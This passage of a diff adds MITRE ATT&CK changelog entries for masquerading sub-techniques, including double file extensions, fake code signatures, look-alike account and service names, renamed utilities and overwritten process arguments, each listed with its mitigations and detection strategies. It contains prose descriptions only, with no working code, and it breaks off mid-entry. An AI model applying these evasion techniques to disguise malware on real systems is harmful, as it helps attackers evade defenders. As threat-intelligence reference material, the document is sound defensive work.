+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.707000+00:00\", \"old_value\": \"2026-04-15 20:37:12.322000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0898: Detection of Spoofed User-Agent"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--11f29a39-0942-4d62-92b6-fe236cf3066e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-08-04 20:54:03.066000+00:00",
+                    "modified": "2026-05-12 15:12:00.621000+00:00",
+                    "name": "Double File Extension",
+                    "description": "Adversaries may abuse a double extension in the filename as a means of masquerading the true file type. A file name may include a secondary file type extension that may cause only the first extension to be displayed (ex: <code>File.txt.exe</code> may render in some views as just <code>File.txt</code>). However, the second extension is the true file type that determines how the file is opened and executed. The real file extension may be hidden by the operating system in the file browser (ex: explorer.exe), as well as in any software configured using or similar to the system\u2019s policies.(Citation: PCMag DoubleExtension)(Citation: SOCPrime DoubleExtension) \n\nAdversaries may abuse double extensions to attempt to conceal dangerous file types of payloads. A very common usage involves tricking a user into opening what they think is a benign file type but is actually executable code. Such files often pose as email attachments and allow an adversary to gain [Initial Access](https://attack.mitre.org/tactics/TA0001) into a user\u2019s system via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) then [User Execution](https://attack.mitre.org/techniques/T1204). For example, an executable file attachment named <code>Evil.txt.exe</code> may display as <code>Evil.txt</code> to a user. The user may then view it as a benign text file and open it, inadvertently executing the hidden malware.(Citation: SOCPrime DoubleExtension)\n\nCommon file types, such as text files (.txt, .doc, etc.) and image files (.jpg, .gif, etc.) are typically used as the first extension to appear benign. Executable extensions commonly regarded as dangerous, such as .exe, .lnk, .hta, and .scr, often appear as the second extension and true file type.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/007",
+                            "external_id": "T1036.007"
+                        },
+                        {
+                            "source_name": "SOCPrime DoubleExtension",
+                            "description": "Eugene Tkachenko. (2020, May 1). Rule of the Week: Possible Malicious File Double Extension. Retrieved July 27, 2021.",
+                            "url": "https://socprime.com/blog/rule-of-the-week-possible-malicious-file-double-extension/"
+                        },
+                        {
+                            "source_name": "PCMag DoubleExtension",
+                            "description": "PCMag. (n.d.). Encyclopedia: double extension. Retrieved August 4, 2021.",
+                            "url": "https://www.pcmag.com/encyclopedia/term/double-extension"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.621000+00:00\", \"old_value\": \"2026-04-15 20:33:07.592000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1017: User Training",
+                            "M1028: Operating System Configuration"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0366: Detection Strategy for Double File Extension Masquerading"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--b4b7458f-81f2-4d38-84be-1c5ba0167a52",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-10 19:49:46.752000+00:00",
+                    "modified": "2026-05-12 15:12:00.709000+00:00",
+                    "name": "Invalid Code Signature",
+                    "description": "Adversaries may attempt to mimic features of valid code signatures to increase the chance of deceiving a user, analyst, or tool. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. Adversaries can copy the metadata and signature information from a signed program, then use it as a template for an unsigned program. Files with invalid code signatures will fail digital signature validation checks, but they may appear more legitimate to users and security tools may improperly handle these files.(Citation: Threatexpress MetaTwin 2017)\n\nUnlike [Code Signing](https://attack.mitre.org/techniques/T1553/002), this activity will not result in a valid signature.",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/001",
+                            "external_id": "T1036.001"
+                        },
+                        {
+                            "source_name": "Threatexpress MetaTwin 2017",
+                            "description": "Vest, J. (2017, October 9). Borrowing Microsoft MetaData and Signatures to Hide Binary Payloads. Retrieved September 10, 2019.",
+                            "url": "https://threatexpress.com/blogs/2017/metatwin-borrowing-microsoft-metadata-and-digital-signatures-to-hide-binaries/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.709000+00:00\", \"old_value\": \"2026-04-15 20:38:13.564000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1045: Code Signing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0031: Invalid Code Signature Execution Detection via Metadata and Behavioral Context"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--d349c66e-18e1-4d8b-a2d7-65af7cbd2ba0",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2024-08-05 21:39:16.274000+00:00",
+                    "modified": "2026-05-12 15:12:00.717000+00:00",
+                    "name": "Masquerade Account Name",
+                    "description": "Adversaries may match or approximate the names of legitimate accounts to make newly created ones appear benign. This will typically occur during [Create Account](https://attack.mitre.org/techniques/T1136), although accounts may also be renamed at a later date. This may also coincide with [Account Access Removal](https://attack.mitre.org/techniques/T1531) if the actor first deletes an account before re-creating one with the same name.(Citation: Huntress MOVEit 2023)\n\nOften, adversaries will attempt to masquerade as service accounts, such as those associated with legitimate software, data backups, or container cluster management.(Citation: Elastic CUBA Ransomware 2022)(Citation: Aquasec Kubernetes Attack 2023) They may also give accounts generic, trustworthy names, such as \u201cadmin\u201d, \u201chelp\u201d, or \u201croot.\u201d(Citation: Invictus IR Cloud Ransomware 2024) Sometimes adversaries may model account names off of those already existing in the system, as a follow-on behavior to [Account Discovery](https://attack.mitre.org/techniques/T1087).  \n\nNote that this is distinct from [Impersonation](https://attack.mitre.org/techniques/T1684/001), which describes impersonating specific trusted individuals or organizations, rather than user or service account names.  ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/010",
+                            "external_id": "T1036.010"
+                        },
+                        {
+                            "source_name": "Elastic CUBA Ransomware 2022",
+                            "description": "Daniel Stepanic, Derek Ditch, Seth Goodwin, Salim Bitam, Andrew Pease. (2022, September 7). CUBA Ransomware Campaign Analysis. Retrieved August 5, 2024.",
+                            "url": "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis"
+                        },
+                        {
+                            "source_name": "Invictus IR Cloud Ransomware 2024",
+                            "description": "Invictus IR. (2024, January 11). Ransomware in the cloud. Retrieved August 5, 2024.",
+                            "url": "https://www.invictus-ir.com/news/ransomware-in-the-cloud"
+                        },
+                        {
+                            "source_name": "Huntress MOVEit 2023",
+                            "description": "John Hammond. (2023, June 1). MOVEit Transfer Critical Vulnerability CVE-2023-34362 Rapid Response. Retrieved August 5, 2024.",
+                            "url": "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
+                        },
+                        {
+                            "source_name": "Aquasec Kubernetes Attack 2023",
+                            "description": "Michael Katchinskiy, Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved July 14, 2023.",
+                            "url": "https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Menachem Goldstein"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "IaaS",
+                        "Identity Provider",
+                        "Linux",
+                        "macOS",
+                        "Office Suite",
+                        "SaaS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.717000+00:00\", \"old_value\": \"2026-04-17 14:21:43.719000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1018: User Account Management",
+                            "M1047: Audit"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0383: Detection Strategy for Masquerading via Account Name Similarity"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--208884f1-7b83-4473-ac22-4e1cf6c41471",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2023-03-08 22:40:06.918000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Masquerade File Type",
+                    "description": "Adversaries may masquerade malicious payloads as legitimate files through changes to the payload's formatting, including the file\u2019s signature, extension, icon, and contents. Various file types have a typical standard format, including how they are encoded and organized. For example, a file\u2019s signature (also known as header or magic bytes) is the beginning bytes of a file and is often used to identify the file\u2019s type. For example, the header of a JPEG file,  is <code> 0xFF 0xD8</code> and the file extension is either `.JPE`, `.JPEG` or `.JPG`. \n\nAdversaries may edit the header\u2019s hex code and/or the file extension of a malicious payload in order to bypass file validation checks and/or input sanitization. This behavior is commonly used when payload files are transferred (e.g., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and stored (e.g., [Upload Malware](https://attack.mitre.org/techniques/T1608/001)) so that adversaries may move their malware without triggering detections. \n\nCommon non-executable file types and extensions, such as text files (`.txt`) and image files (`.jpg`, `.gif`, etc.) may be typically treated as benign.  Based on this, adversaries may use a file extension to disguise malware, such as naming a PHP backdoor code with a file name of <code>test.gif</code>. A user may not know that a file is malicious due to the benign appearance and file extension.\n\nPolyglot files, which are files that have multiple different file types and that function differently based on the application that will execute them, may also be used to disguise malicious malware and capabilities.(Citation: polygot_icedID)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/008",
+                            "external_id": "T1036.008"
+                        },
+                        {
+                            "source_name": "polygot_icedID",
+                            "description": "Lim, M. (2022, September 27). More Than Meets the Eye: Exposing a Polyglot File That Delivers IcedID. Retrieved September 29, 2022.",
+                            "url": "https://unit42.paloaltonetworks.com/polyglot-file-icedid-payload"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Ben Smith",
+                        "CrowdStrike Falcon OverWatch"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2026-04-15 20:39:13.971000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1038: Execution Prevention",
+                            "M1040: Behavior Prevention on Endpoint",
+                            "M1049: Antivirus/Antimalware"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0226: Detection Strategy for Masquerading via File Type Modification"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-10 20:30:07.426000+00:00",
+                    "modified": "2026-05-12 15:12:00.644000+00:00",
+                    "name": "Masquerade Task or Service",
+                    "description": "Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.\n\nTasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/004",
+                            "external_id": "T1036.004"
+                        },
+                        {
+                            "source_name": "Fysbis Dr Web Analysis",
+                            "description": "Doctor Web. (2014, November 21). Linux.BackDoor.Fysbis.1. Retrieved December 7, 2017.",
+                            "url": "https://vms.drweb.com/virus/?i=4276269"
+                        },
+                        {
+                            "source_name": "Palo Alto Shamoon Nov 2016",
+                            "description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
+                            "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+                        },
+                        {
+                            "source_name": "Systemd Service Units",
+                            "description": "Freedesktop.org. (n.d.). systemd.service \u2014 Service unit configuration. Retrieved March 16, 2020.",
+                            "url": "https://www.freedesktop.org/software/systemd/man/systemd.service.html"
+                        },
+                        {
+                            "source_name": "TechNet Schtasks",
+                            "description": "Microsoft. (n.d.). Schtasks. Retrieved April 28, 2016.",
+                            "url": "https://technet.microsoft.com/en-us/library/bb490996.aspx"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.644000+00:00\", \"old_value\": \"2026-04-15 20:39:39.311000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0117: Detection of Masqueraded Tasks or Services with Suspicious Naming and Execution"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-10 20:43:10.239000+00:00",
+                    "modified": "2026-05-12 15:12:00.622000+00:00",
+                    "name": "Match Legitimate Resource Name or Location",
+                    "description": "Adversaries may match or approximate the name or location of legitimate files, Registry keys, or other resources when naming/placing them. This is done for the sake of evading defenses and observation. \n\nThis may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: `svchost.exe`). Alternatively, a Windows Registry key may be given a close approximation to a key used by a legitimate program. In containerized environments, a threat actor may create a resource in a trusted namespace or one that matches the naming convention of a container pod or cluster.(Citation: Aquasec Kubernetes Backdoor 2023)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/005",
+                            "external_id": "T1036.005"
+                        },
+                        {
+                            "source_name": "Aquasec Kubernetes Backdoor 2023",
+                            "description": "Michael Katchinskiy and Assaf Morag. (2023, April 21). First-Ever Attack Leveraging Kubernetes RBAC to Backdoor Clusters. Retrieved March 24, 2025.",
+                            "url": "https://www.aquasec.com/blog/leveraging-kubernetes-rbac-to-backdoor-clusters/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Vishwas Manral, McAfee",
+                        "Yossi Weizman, Azure Defender Research Team"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Containers",
+                        "ESXi",
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.622000+00:00\", \"old_value\": \"2026-04-15 20:39:41.881000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions",
+                            "M1038: Execution Prevention",
+                            "M1045: Code Signing"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0347: Detection Strategy for Masquerading via Legitimate Resource Name or Location"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--514dc7b3-0b80-4382-80a9-2e2d294f5019",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-03-27 20:37:52.269000+00:00",
+                    "modified": "2026-05-12 15:12:00.632000+00:00",
+                    "name": "Overwrite Process Arguments",
+                    "description": "Adversaries may modify a process's in-memory arguments to change its name in order to appear as a legitimate or benign process. On Linux, the operating system stores command-line arguments in the process\u2019s stack and passes them to the `main()` function as the `argv` array. The first element, `argv[0]`, typically contains the process name or path - by default, the command used to actually start the process (e.g., `cat /etc/passwd`). By default, the Linux `/proc` filesystem uses this value to represent the process name. The `/proc/<PID>/cmdline` file reflects the contents of this memory, and tools like `ps` use it to display process information. Since arguments are stored in user-space memory at launch, this modification can be performed without elevated privileges. \n\nDuring runtime, adversaries can erase the memory used by all command-line arguments for a process, overwriting each argument string with null bytes. This removes evidence of how the process was originally launched. They can then write a spoofed string into the memory region previously occupied by `argv[0]` to mimic a benign command, such as `cat resolv.conf`. The new command-line string is reflected in `/proc/<PID>/cmdline` and displayed by tools like `ps`.(Citation: Sandfly BPFDoor 2022)(Citation: Microsoft XorDdos Linux Stealth 2022) ",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/011",
+                            "external_id": "T1036.011"
+                        },
+                        {
+                            "source_name": "Microsoft XorDdos Linux Stealth 2022",
+                            "description": "Ratnesh Pandey, Yevgeny Kulakov, and Jonathan Bar Or with Saurabh Swaroop. (2022, May 19). Rise in XorDdos: A deeper look at the stealthy DDoS malware targeting Linux devices. Retrieved September 27, 2023.",
+                            "url": "https://www.microsoft.com/en-us/security/blog/2022/05/19/rise-in-xorddos-a-deeper-look-at-the-stealthy-ddos-malware-targeting-linux-devices/"
+                        },
+                        {
+                            "source_name": "Sandfly BPFDoor 2022",
+                            "description": "The Sandfly Security Team. (2022, May 11). BPFDoor - An Evasive Linux Backdoor Technical Analysis. Retrieved September 29, 2023.",
+                            "url": "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux"
+                    ],
+                    "x_mitre_version": "2.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.632000+00:00\", \"old_value\": \"2026-04-15 20:40:03.475000+00:00\"}}}",
+                    "previous_version": "2.0",
+                    "changelog_mitigations": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0164: Detection Strategy for Overwritten Process Arguments Masquerading"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-10 20:03:11.691000+00:00",
+                    "modified": "2026-05-12 15:12:00.713000+00:00",
+                    "name": "Rename Legitimate Utilities",
+                    "description": "Adversaries may rename legitimate / system utilities to try to evade security mechanisms concerning the usage of those utilities. Security monitoring and control mechanisms may be in place for legitimate utilities adversaries are capable of abusing, including both built-in binaries and tools such as PSExec, AutoHotKey, and IronPython.(Citation: LOLBAS Main Site)(Citation: Huntress Python Malware 2025)(Citation: The DFIR Report AutoHotKey 2023)(Citation: Splunk Detect Renamed PSExec) It may be possible to bypass those security mechanisms by renaming the utility prior to utilization (ex: rename <code>rundll32.exe</code>).(Citation: Elastic Masquerade Ball) An alternative case occurs when a legitimate utility is copied or moved to a different directory and renamed to avoid detections based on these utilities executing from non-standard paths.(Citation: F-Secure CozyDuke)",
+                    "kill_chain_phases": [
+                        {
+                            "kill_chain_name": "mitre-attack",
+                            "phase_name": "stealth"
+                        }
+                    ],
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/techniques/T1036/003",
+                            "external_id": "T1036.003"
+                        },
+                        {
+                            "source_name": "Elastic Masquerade Ball",
+                            "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.",
+                            "url": "https://www.elastic.co/blog/how-hunt-masquerade-ball"
+                        },
+                        {
+                            "source_name": "F-Secure CozyDuke",
+                            "description": "F-Secure Labs. (2015, April 22). CozyDuke: Malware Analysis. Retrieved December 10, 2015.",
+                            "url": "https://www.f-secure.com/documents/996508/1030745/CozyDuke"
+                        },
+                        {
+                            "source_name": "LOLBAS Main Site",
+                            "description": "LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.",
+                            "url": "https://lolbas-project.github.io/"
+                        },
+                        {
+                            "source_name": "Huntress Python Malware 2025",
+                            "description": "Matthew Brennan. (2024, July 5). Snakes on a Domain: An Analysis of a Python Malware Loader. Retrieved April 3, 2025.",
+                            "url": "https://www.huntress.com/blog/snakes-on-a-domain-an-analysis-of-a-python-malware-loader"
+                        },
+                        {
+                            "source_name": "Splunk Detect Renamed PSExec",
+                            "description": "Splunk. (2025, February 24). Detection: Detect Renamed PSExec. Retrieved April 3, 2025.",
+                            "url": "https://research.splunk.com/endpoint/683e6196-b8e8-11eb-9a79-acde48001122/"
+                        },
+                        {
+                            "source_name": "The DFIR Report AutoHotKey 2023",
+                            "description": "The DFIR Report. (2023, February 6). Collect, Exfiltrate, Sleep, Repeat. Retrieved April 3, 2025.",
+                            "url": "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_contributors": [
+                        "Matt Anderson, @\u200cnosecurething, Huntress"
+                    ],
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_is_subtechnique": true,
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_platforms": [
+                        "Linux",
+                        "macOS",
+                        "Windows"
+                    ],
+                    "x_mitre_version": "3.0",
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.713000+00:00\", \"old_value\": \"2026-04-15 20:40:54.471000+00:00\"}}}",
+                    "previous_version": "3.0",
+                    "changelog_mitigations": {
+                        "shared": [
+                            "M1022: Restrict File and Directory Permissions"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_datacomponent_detections": {
+                        "shared": [],
+                        "new": [],
+                        "dropped": []
+                    },
+                    "changelog_detectionstrategy_detections": {
+                        "shared": [
+                            "DET0005: Renamed Legitimate Utility Execution with Metadata Mismatch and Suspicious Path"
+                        ],
+                        "new": [],
+                        "dropped": []
+                    }
+                },
+                {
+                    "type": "attack-pattern",
+                    "id": "attack-pattern--77eae145-55db-4519-8ae5-77b0c7215d69",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2020-02-10 19:55:29.385000+00:00",
+                    "modified": "2026-05-12 15:12:00.643000+00:00",
+                    "name": "Right-to-Left Override",
